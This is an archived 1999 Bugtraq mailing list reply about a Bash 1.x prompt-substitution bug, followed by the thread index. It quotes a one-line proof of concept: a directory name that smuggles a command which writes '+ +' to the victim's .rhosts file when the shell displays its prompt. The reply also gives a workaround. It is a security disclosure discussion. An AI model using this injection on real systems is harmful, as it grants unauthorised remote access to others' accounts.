Bugtraq mailing list archives
Re: Bash Bug
From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Thu, 22 Apr 1999 11:16:06 +0200
On Tue, 20 Apr 1999, Shadow wrote:
mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not seem to be vulnerable. Anyway, there's a hope even for those who want to stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee). --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!"
Current thread:
- Corrected Linux 2.2.5 FIN/NULL/XMAS block patch, (continued)
- Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 19)
- Re: Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 20)
- Re: Plain text passwords--necessary Taral (Apr 19)
- Re: Plain text passwords--necessary Trevor Schroeder (Apr 19)
- bug in ssh allowing to be invissible Grzegorz Stelmaszek (Apr 19)
- Re: bug in ssh allowing to be invissible Pete (Apr 20)
- Re: bug in ssh allowing to be invissible Joe Gross (Apr 20)
- NetBSD Security Advisory 1999-009 matthew green (Apr 20)
- Bash Bug Shadow (Apr 20)
- Re: Bash Bug Marc Lehmann (Apr 21)
- Re: Bash Bug Pavel Kankovsky (Apr 22)
- Re: Bash Bug Chet Ramey (Apr 22)
- L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
- Re: Plain text passwords--necessary Densin Roy. (Apr 19)
- Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
- AOL Instant Messenger URL Crash Adam Brown (Apr 19)
- Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
- Shopping Carts exposing CC data Joe (Apr 19)
- Re: Shopping Carts exposing CC data Joe (Apr 20)
- Outlook 98 allows spoofing internal users Nate Lawson (Apr 20)
- Re: Outlook 98 allows spoofing internal users Peter van Dijk (Apr 25)